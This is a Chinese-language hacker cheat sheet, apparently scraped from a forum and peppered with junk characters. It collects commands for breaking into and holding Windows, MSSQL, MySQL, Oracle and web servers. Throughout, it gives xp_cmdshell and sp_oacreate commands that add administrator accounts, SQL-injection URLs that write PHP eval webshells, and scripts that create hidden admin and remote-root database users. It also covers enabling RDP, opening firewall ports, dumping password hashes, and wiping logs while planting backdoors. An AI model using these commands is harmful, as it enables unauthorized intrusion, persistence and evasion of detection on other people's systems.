( `# [6 k* S5 [+ f5 T+ B
1.net user administrator /passwordreq:no& O6 h, |" e: K6 h
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
$ F$ _) U( [+ W7 y2.比较巧妙的建克隆号的步骤
" X; \; |( N! x7 ^8 t3 s5 D先建一个user的用户$ P6 \3 | `. I4 W
然后导出注册表。然后在计算机管理里删掉
. ^2 G+ E5 f b8 j4 m, b在导入,在添加为管理员组/ j K$ G; ]7 T- q0 ]9 X3 B% I9 g
3.查radmin密码5 V( W& W1 g, F0 Y
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg3 L8 O D' `: k' j
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
( V. P2 O. v8 V7 Q8 K3 X- L建立一个"services.exe"的项
, N8 \. m1 i; q3 C* E再在其下面建立(字符串值)
$ W# L2 g" N# ], h9 O% X1 ]键值为mu ma的全路径
S$ | t9 v6 I! m# p6 Q5.runas /user:guest cmd
; ^2 S: V1 H$ I# R$ G$ m6 w/ [9 Y- J测试用户权限!
% K" F9 |0 ~$ t3 N6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
2 ]( f+ w' J( @: g- q7.入侵后漏洞修补、痕迹清理,后门置放:
2 x( [* D9 E u( a1 p基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
3 s+ t$ e, Q/ n- b- t( {* ^3 x8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
, `6 j# ?( w8 L& o1 q6 @3 Q' T
- d- [& |8 ]# d! B7 Qfor example: _! K1 W* P. O4 u G5 |1 h
) _, b9 \6 X. {7 t c2 Q+ K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'" B2 v/ ]" p: e, A4 F
0 J6 a7 s4 H. Q+ `! v! W( jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'% `, v, ]. d) l$ n: n. X
8 w+ Z/ O2 x# D+ D7 y& h0 Q
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
7 E y5 t, e7 x如果要启用的话就必须把他加到高级用户模式3 Y# _+ h v" b/ P! o
可以直接在注入点那里直接注入
2 @9 ]/ b: Z" e: G/ M ^2 jid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--# p/ r, j b8 M. r0 z, |! z
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--! o _- }0 O7 n/ b
或者8 y0 p. o0 \, L7 t' b7 J3 O; ]- Q
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
! \; {/ ?) V& e9 S' b. U: d3 B9 |来恢复cmdshell。
5 u0 r' [, Q4 T# O, M) o9 P7 S) n8 a1 T
分析器" ]; _0 l1 t0 S9 L" k
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
( ?/ E' C# h! |: l6 [5 _然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
; [! G6 V( G) u6 T" V10.xp_cmdshell新的恢复办法9 M" Z q7 j2 e; r' {& g
xp_cmdshell新的恢复办法
. I/ [( a$ B9 d' _' L: H4 D扩展储存过程被删除以后可以有很简单的办法恢复:
/ ^1 {# A- i5 O b' A6 G8 {$ M删除/ J2 a0 ?, @7 d- [
drop procedure sp_addextendedproc* x/ v; ]2 ]" u: Y f
drop procedure sp_oacreate/ q& I6 S# |) r$ P
exec sp_dropextendedproc 'xp_cmdshell'0 |+ t+ p& {( l3 F& F7 B' b* H+ [' y
$ Y5 S2 k1 g% |4 B
恢复3 ]; e6 S' m; b; \) K. a- c9 j
dbcc addextendedproc ("sp_oacreate","odsole70.dll")& P( z1 _1 J3 z4 E7 B3 e. G
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
' q3 s) Q# a5 M3 ~8 I/ `: k4 Q8 X9 c% h' L0 @+ ~* _4 v$ D1 q0 ^7 N
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
4 D3 M8 X5 d; O
9 i" g7 I# |1 F8 b0 W$ }-----------------------------
- H4 W2 \9 h6 U7 Y+ }: l4 h2 G6 K3 e2 [* _) l$ y! p
删除扩展存储过过程xp_cmdshell的语句:
/ r8 }4 f% A4 `( W; qexec sp_dropextendedproc 'xp_cmdshell'
/ W- @6 w6 T! }' Y
" p# I3 E/ @: {/ e7 l恢复cmdshell的sql语句
: S' ^) a( G/ I: C3 o9 [exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
* X( E- \* N3 H$ h3 `2 D) a5 Y4 Z! k0 p9 t
2 ^1 g2 W) o z) l开启cmdshell的sql语句
- c4 G4 b |! I" u( ~" d' X2 b5 l# _6 y
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
+ M3 ?! c2 L9 u
5 ?9 F: R$ w7 H3 ]& o8 ]9 z, A+ u判断存储扩展是否存在: p7 b! j( @ B$ Q5 \$ l8 E
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
& e: g" l0 i3 a& } }0 d返回结果为1就ok
) J( |# O( r6 ]+ y- ?7 s
/ @, k1 ]: K! \( x: l( ] T. I! [+ V恢复xp_cmdshell# ?- T1 Z6 z% }7 E5 n0 }5 U
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
% ~0 i( ^& W2 \返回结果为1就ok t! d" X9 \; p, [ X
3 t) C: J3 T& o M% k1 B* g* y; V5 h
否则上传xplog7.0.dll" `; ~4 W, d& }6 q( }+ A: A# |1 v
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
6 {; y/ ~1 r, T) y6 E! C# z8 }1 I5 B# l* _; t) ?% M$ x- t
堵上cmdshell的sql语句 I" N" |+ X9 k+ B
sp_dropextendedproc "xp_cmdshel
6 @" c; y+ y' K# D9 r0 K L9 F-------------------------
- P" l- ^- c: X5 Q, M% P4 J f清除3389的登录记录用一条系统自带的命令:* L7 i. ]) j$ n1 z2 e" T- H, T
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
7 c V7 x: p0 T0 R' b$ i6 {) q( M8 t8 s& G1 u
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件$ i, w+ g+ r" I
在 mysql里查看当前用户的权限
" t0 B$ S( @$ _% l( M! }+ Gshow grants for $ K5 z% S8 f0 i& p. G+ E1 [
7 j/ A. R, U7 ?5 l9 r
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
9 T- [+ `+ p( ~! j4 S" K
0 @& ~4 X% a% U# C4 R n. Z) k; d1 k: m% L& y+ O& }
Create USER 'itpro'@'%' IDENTIFIED BY '123';
6 R1 z" r; f( j& Y+ ?! i6 ~( Z9 s* f a7 q: U; C0 C, d! p
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION3 i q# W4 r! Q* {- J4 K
: a% s7 D( N {3 D1 S. D* i
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
5 |8 ?* W; A T: d
]2 [3 b8 O' BMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
4 ^9 B! i9 |2 C' y0 A7 q1 N1 C1 p
/ j7 ?* I% O" Q; h6 t搞完事记得删除脚印哟。2 I' x2 O, q* T+ M9 N+ ^7 B
+ F5 K5 e& M, wDrop USER 'itpro'@'%';, l# l& B! Z' y
7 a5 f3 K7 @" N$ e+ \Drop DATABASE IF EXISTS `itpro` ;4 |# n9 E& {8 V8 W) b
: z g8 x8 R, P+ g; q2 }* w+ a当前用户获取system权限6 ], D( [& a- ~8 E: D! G
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
# K! {- O8 a" M, h# |0 rsc start SuperCMD
, ?4 u1 }( w' Q4 b$ v7 G: e, k: k* g程序代码
% e5 c1 o0 @& }" Z* y. Y4 h<SCRIPT LANGUAGE="VBScript">% I" i4 k0 s( a5 U$ b& ]" M1 @; x1 X
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
- H3 L2 C0 j, A4 j! ~6 n8 hos="WinNT://"&wsnetwork.ComputerName
7 S+ T& h: a" @% L2 qSet ob=GetObject(os)
6 k2 l W( O4 MSet oe=GetObject(os&"/Administrators,group")
% M4 `) c0 J8 M! n8 |Set od=ob.Create("user","nosec")+ I) N( d3 o: `# i+ P" ?1 x
od.SetPassword "123456abc!@#"
4 l& C4 a% o2 l8 i! X) @( B5 rod.SetInfo2 r+ g* I5 A( l! [( \
Set of=GetObject(os&"/nosec",user)
% f# u9 K3 o: ~8 _* roe.add os&"/nosec"
. o' H- I5 ]/ g1 w* s" o</Script>
* e, x: o+ D: a; N1 B<script language=javascript>window.close();</script>
9 B4 W$ P! L' k# h% s
4 k1 s9 u: O5 \/ B; r% o8 I: L: A! [
* K4 N' K: x }3 T' L" Q
% ]' a0 R8 c0 k, ]; H
突破验证码限制入后台拿shell* j# a( H2 w& z& q& g, p: T
程序代码3 w1 a5 W* ^* Y3 M* g7 M/ d
REGEDIT4
% t3 v1 ]0 J+ M2 c! b( i[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
$ F8 p: @2 M( }6 r9 R' J0 n"BlockXBM"=dword:00000000# _; T6 j' m3 e; y, ]! D" u' K) x% o
; R; f. b3 c3 R9 @
保存为code.reg,导入注册表,重器IE
8 f- M5 g6 B) |4 Q& S9 V) J' B' V就可以了
' O7 y6 {) n' a5 o% ?; B/ Nunion写马! C* P! R# N' `; ]9 T8 h. F
程序代码1 b+ I! \0 S/ [* Y
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*, d9 i l- j" O% D0 N* f9 _
8 f. y5 e% w1 W S1 Z1 x
应用在dedecms注射漏洞上,无后台写马# M- |$ G# S, Q+ f# U* w
dedecms后台,无文件管理器,没有outfile权限的时候
$ i8 b0 e; S2 S在插件管理-病毒扫描里
- V7 ^" U3 B4 G# x% {写一句话进include/config_hand.php里
6 _- W! m( Z6 T: w4 z2 B程序代码* i, c+ \% y1 S! g ^8 p
>';?><?php @eval($_POST[cmd]);?>! N+ f9 V' t& ?/ ]4 B O
8 ?# L% H+ T6 G# D
: ~$ [& X6 }5 p如上格式, W: r9 x9 U0 c0 ~- d
2 K6 N. ~, I+ Z# j/ D9 P
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
; m; r, y$ ~$ O- z5 y+ q' j程序代码
$ c# J! G% h2 J+ M$ v# Nselect username,password from dba_users;
$ @/ u7 f* Z% {$ D6 ~& `0 U' Y) }6 O# z, ? w
8 l p) ?4 P6 r- Q, Y
mysql远程连接用户1 @" Q M4 @: o6 b) ?
程序代码! d7 l0 x5 Q% M: c
1 d* o5 Y0 o/ S! [4 U- M7 wCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';7 T, W" E+ v6 @
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
' Y, ?; F$ X8 s. a- @9 ~! F3 b2 Q9 _MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 l0 c( T% o3 j8 Q% x
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
+ N/ d7 Y0 L( a+ O! X7 u$ s5 ]6 u$ y" @" G( G/ K7 \
$ G* x s) H& c$ ?6 O% y- {9 P
2 I, p. [' T! g: S7 X
: o7 J+ N$ [& \
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 06 N4 w8 r3 ]( q. v
0 D# B# {+ O+ O# L
1.查询终端端口3 K1 Z/ K: }& h$ q& }, f
3 f Y P1 `! `2 ^+ Q* Uxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber! p' F2 Z3 D$ G) I1 k
, R( Q6 N; H# k; k. a9 [* ]9 [通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"! W* _: Z5 g% B, x+ r) k
type tsp.reg
+ q' i* j! X, @+ u1 O. t7 q- x
1 b! G" O3 M+ O: a( Y8 \( I& `2.开启XP&2003终端服务+ |. @/ U5 d1 _* @
5 ^. o7 G# d' b: y4 r1 p3 @
( [- U W) x5 d' @+ W2 \+ g* zREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
7 T4 I, _' i2 O# Z, V# {% b" U C
' }! n0 }0 N/ H( ^
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
% V. G8 h5 O% B, A' x7 q/ b) X, i: {7 l/ @
3.更改终端端口为20008(0x4E28)
7 w/ U$ w) K5 e8 f9 H: ?( l6 d- D2 X$ m# H8 w0 d
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
1 J+ k, ]! c/ b7 Z; e9 k* v3 S! O6 j, Y( y7 k- r$ S% W% T
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f0 c" q) Z) y: o6 q4 V8 h
9 ^6 g) {$ T/ \% L- S, P4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制6 j2 p- a; F$ L. X
) O9 t; H L1 AREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f6 F+ g P7 V! B1 m; z
( D# p; A: K- \& |( e( n
! P i" |5 z* `% J/ [! K3 ^: p5.开启Win2000的终端,端口为3389(需重启)5 n. W$ S2 H& h7 U8 R
; T& s0 \8 f* N1 z" Decho Windows Registry Editor Version 5.00 >2000.reg ( o& b9 r# H) i! t9 m. Q
echo. >>2000.reg
3 C; r0 w* D o }echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 7 G1 r$ ^- [' W0 C! s4 @
echo "Enabled"="0" >>2000.reg
4 D8 ~$ ^* D% w% T/ m0 Uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
! Z) D' @' {& L6 Necho "ShutdownWithoutLogon"="0" >>2000.reg
( ~% z! P; x/ B6 ^6 [1 T/ ^1 ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg ) Y9 l6 e& T: k6 ^" R
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg # r0 F9 ?2 ^. p7 R9 o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 5 \* p& j* ?* ?' ]
echo "TSEnabled"=dword:00000001 >>2000.reg ) c* ?, D1 K$ x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
7 V# g- L: R8 a$ f' Mecho "Start"=dword:00000002 >>2000.reg
* j$ w, S; I/ d6 G5 Z, Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
( U, j5 u( C7 x. l# uecho "Start"=dword:00000002 >>2000.reg 7 M# n* f @" P: E
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 7 r* \" y! k* ~# I" C
echo "Hotkey"="1" >>2000.reg # z; X$ q! S8 ?' x0 q4 {; }, P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
1 c, ?6 t* {1 M2 r( Secho "ortNumber"=dword:00000D3D >>2000.reg 2 w, ]2 _) s( A0 q- G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
/ n9 y+ p+ b4 j8 cecho "ortNumber"=dword:00000D3D >>2000.reg D( }/ D7 x/ m# c5 n
9 p8 }4 ^0 k. ?
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启), T: s- \. n% N4 X4 Z4 o
M8 p% l T$ C. p8 T
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf7 j, r6 V$ ?, m& `+ R
(set inf=InstallHinfSection DefaultInstall)% l0 K( s4 P2 ]. ]5 n
echo signature=$chicago$ >> restart.inf. z& f& [2 g1 X0 g/ o: c
echo [defaultinstall] >> restart.inf
$ D+ w* g* m, H Y% @- D" C) Brundll32 setupapi,%inf% 1 %temp%\restart.inf
6 M: k1 r7 _/ M8 o. C' d& a8 |3 ~/ m- W( I
0 k1 k- P3 ^, J: |7.禁用TCP/IP端口筛选 (需重启)
; U1 q! a6 P1 e- V3 M+ b# U
/ @5 K. y- p, o# eREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
4 k% M5 w, j4 Q. B; r: D e! j
( q. O% C% p( p4 R( U/ a8.终端超出最大连接数时可用下面的命令来连接
$ a1 x+ P' d2 c/ G; v/ Q, ~; L: K8 J' H
mstsc /v:ip:3389 /console2 u, f; d1 j' U- w3 g9 _0 X
6 h) D, ~4 R0 n- c% R5 e1 @9.调整NTFS分区权限& A$ {1 T& |/ w0 \$ }
/ k: a" W2 M! T$ k: t, t9 dcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)0 Z3 a% X/ O% M& |. n: ]' W
& \2 g6 _% ~+ y6 l! Hcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
$ |9 m! ?7 B% x; t& {4 M& w+ Q2 q
8 B2 @" E! ]/ p0 z------------------------------------------------------
3 x. j& c1 s4 j1 [% m! e# D3389.vbs 7 A. {7 R7 [! P! w/ N7 r5 z
On Error Resume Next; i9 B% [$ z0 x1 v
const HKEY_LOCAL_MACHINE = &H80000002
6 p% h3 P7 N# w. g* ^2 V& PstrComputer = "."
% l3 K- c" n- c( N3 O2 H5 DSet StdOut = WScript.StdOut1 e7 |2 L9 L; k
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
- L% Y* r& n: ^9 S4 i- l; pstrComputer & "\root\default:StdRegProv")3 M8 G1 U: ]: h8 x! j! g
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
6 O! \6 d8 j7 I7 {' c1 Foreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath- O- v/ g/ o/ W% E5 c% S
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"7 U x& I B6 G) z" I
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath; E1 O' E- z% K" x' H/ B
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"- O0 j; U# d5 n% r
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"" P& i9 S; l; v" \7 }6 {
strValueName = "fDenyTSConnections"
0 S/ E y3 h; a! n! M0 i* YdwValue = 0
# ?% Y! ^9 q( ^2 zoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue* f/ e5 I2 j# m) C% X! ^
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
3 p. e7 F n* _& B% i Y0 S6 KstrValueName = "ortNumber"
9 V. H( z+ o/ @) `) |dwValue = 3389
3 Z* D' a% M i- N" h0 e7 L" \oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' c; i: n& W! X% p8 L3 x/ B1 D" nstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", C( I1 s7 o/ ^6 s3 _
strValueName = "ortNumber"
/ S: [2 h& h, [; E* ~; ?* }2 b: `dwValue = 3389
% X9 @1 b0 C, k2 F' Eoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
6 H: X* k1 U) B2 b# m% `, USet R = CreateObject("WScript.Shell")
5 C7 D$ A3 L# OR.run("Shutdown.exe -f -r -t 0") ; h9 H( k# t* i6 h
! w! L5 W5 Z' n% L
删除awgina.dll的注册表键值4 b& a: E6 g6 P5 c+ B
程序代码
9 `# x3 q8 f; ]+ X
0 p* B# g+ l, Q V" Ireg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f; Y' @& O1 r& ]1 N/ e4 _8 t
9 {6 q: ]+ h' n( M
/ {5 O/ B5 X9 u% W( d# x; H
" u2 H1 q, l0 Y' E
2 _0 M$ A M7 A
程序代码
9 { \( L6 a5 Y, z1 _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash, V R3 W9 q, Q
9 Y0 _& c. D, v# X$ P; j6 n% T9 J设置为1,关闭LM Hash6 G4 C: u# R$ s3 p8 l0 `2 J; B
t0 C: c& H: L$ J+ V0 J/ w数据库安全:入侵Oracle数据库常用操作命令
& [3 ?2 p# l5 E6 k5 E1 ]8 b最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。- {$ S6 u7 ^( ~; e* I9 y9 k
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。- R* E$ |$ G" s
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;5 K' w' c& J/ S
3、SQL>connect / as sysdba ;(as sysoper)或) e% q6 c) | M
connect internal/oracle AS SYSDBA ;(scott/tiger)
! t: @6 v" \* B2 P. l- ~, econn sys/change_on_install as sysdba;9 E" a+ d9 f1 x) j6 }( ^6 k* k1 i
4、SQL>startup; 启动数据库实例
% ?( _5 Q+ c# V! L1 p$ R2 }5、查看当前的所有数据库: select * from v$database;
2 J# W7 }; i* d. C$ z; L- iselect name from v$database;, M6 P3 [9 O& ~! f
6、desc v$databases; 查看数据库结构字段
* i. a, _6 f- I7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
$ _ I3 o2 @0 ]SQL>select * from V_$PWFILE_USERS;
7 x$ x* | g1 v t- i7 r) e: mShow user;查看当前数据库连接用户6 {4 J- I' X* B2 c1 e4 J# c
8、进入test数据库:database test;
: d0 x6 M5 u; j! [# A9、查看所有的数据库实例:select * from v$instance;$ h A' o0 `- y$ s% }
如:ora9i
6 @2 n, \% Q; g' L10、查看当前库的所有数据表:
# A2 }* p& `5 G( z8 H8 k5 wSQL> select TABLE_NAME from all_tables;
& V# v y' B; J/ l, Nselect * from all_tables;
) y8 \7 n) h1 g9 J* wSQL> select table_name from all_tables where table_name like '%u%';
/ \% x+ z' G7 @& m9 ^4 PTABLE_NAME& U" I2 c% i0 Z) S
------------------------------4 `" e% K& X! y+ }. d: J: S: ^' Q d$ s
_default_auditing_options_
" v7 p0 {+ x Y' X; h11、查看表结构:desc all_tables;2 F6 i+ k! B7 f9 `( k
12、显示CQI.T_BBS_XUSER的所有字段结构:
! P k1 j( [' v* P4 }1 q; Fdesc CQI.T_BBS_XUSER;
( }: C+ `- u! X* c' I) T13、获得CQI.T_BBS_XUSER表中的记录:/ \5 U4 r4 u9 q6 k
select * from CQI.T_BBS_XUSER;
% u. I) R, t( r. ?" r14、增加数据库用户:(test11/test)
! ?, @, W* S; Ncreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
) n' f! l! o; A8 F0 S9 j15、用户授权:/ v. ~ s) u! V# P% ?
grant connect,resource,dba to test11;3 k2 L! V4 z* O4 t1 a) O* x- _
grant sysdba to test11;) w# c) H$ @ ?2 |9 h
commit;$ x# x! X% v" S/ d* ^0 ?) l! w$ I; O
16、更改数据库用户的密码:(将sys与system的密码改为test.)
) |. ?$ Y, @/ y# Oalter user sys indentified by test;
& I1 Q; Y5 p7 A+ C7 ^, `7 p1 Balter user system indentified by test;. e9 f# u( N0 `) F6 T* a9 l
4 ~! t9 l2 a4 y; g
applicationContext-util.xml+ n3 a+ e! g; D1 I2 C
applicationContext.xml
* }; i ?% v x6 x6 Vstruts-config.xml
$ B u' k6 H6 s1 j. {% ?/ ~) Hweb.xml
# Q+ X/ l% P. _4 U& _5 Mserver.xml/ l3 d$ H) r1 S1 J( R8 n, g2 R
tomcat-users.xml
( q6 U a7 z [/ ]/ x8 Ihibernate.cfg.xml
! d0 |6 e' w- j" {0 T: |& L" hdatabase_pool_config.xml
* x, s4 U9 `) a( x: d# z
* s: w: K/ x. L7 A: S/ K, u* {4 z: R7 A4 y2 G2 |( n1 j
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置2 I7 ]! S! v$ I' I/ W" M1 t
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini( B) l* F0 L" R" v/ [: a2 g
\WEB-INF\struts-config.xml 文件目录结构
2 z! ^2 F- Q5 [1 C1 b) s& _; T. O- P: m& v9 Z: t0 z6 d7 S& c* i
spring.properties 里边包含hibernate.cfg.xml的名称
1 f) H- F) e0 i' Y7 Q$ V' x5 W2 v
! Q( o" ^1 B" J6 w, S5 ? ^" i- @" J, p
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
# o: Y, j1 g; J( v6 d0 a7 @: a j7 U8 J: Q+ U) |) h" F
如果都找不到 那就看看class文件吧。。
+ Y+ c, k2 D5 V6 A% t! Y
8 O, Q# Q+ H3 k R测试1:; A- y2 g+ W- V6 {% U
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1+ I9 R3 X& T& h+ k' N/ N+ J" Y
- F$ ] D6 W% m- y9 J* T5 p测试2:6 _3 e" C' z8 [' s+ ]6 n D
! K1 k8 L$ X- _$ A! y" f! O
create table dirs(paths varchar(100),paths1 varchar(100), id int)
" t" E: g+ O$ w, H3 A5 Z8 a' P. o) y. ?8 |7 z
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--/ T4 [ d' B: p4 ^% f
w7 M4 G+ P: }. _
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
! s( G3 j, t+ x
5 l* t4 a9 A" l) X! J# W查看虚拟机中的共享文件:
. c n8 n: R% o在虚拟机中的cmd中执行
S. W a9 ]2 x* y\\.host\Shared Folders
* \' ^0 X0 X/ H% t0 T2 S
( B0 R; b8 f4 V; l/ Z6 y! o5 Pcmdshell下找终端的技巧$ h( I+ s+ F7 k, S4 e r) r, N
找终端: ) i+ G, z& e- X
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 8 P2 c Y- ` \0 n/ r: l: ~
而终端所对应的服务名为:TermService # z) }1 E9 W0 U" \
第二步:用netstat -ano命令,列出所有端口对应的PID值! + w: L8 d: I% |
找到PID值所对应的端口3 v+ k1 O+ W7 [0 Q
% ^4 M0 E, K) u6 W$ O4 Z! ` _$ x
查询sql server 2005中的密码hash! m; S( H$ s- ?! J
SELECT password_hash FROM sys.sql_logins where name='sa'
; K1 j1 P5 A% r% M* hSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a# z" X4 a4 h3 B9 A0 ~
access中导出shell
9 u6 j) o7 ^6 H# {: a" ?
; w8 ?7 \5 q$ K& J) }2 f中文版本操作系统中针对mysql添加用户完整代码: l2 \: }3 s; Z9 C. q0 j9 d
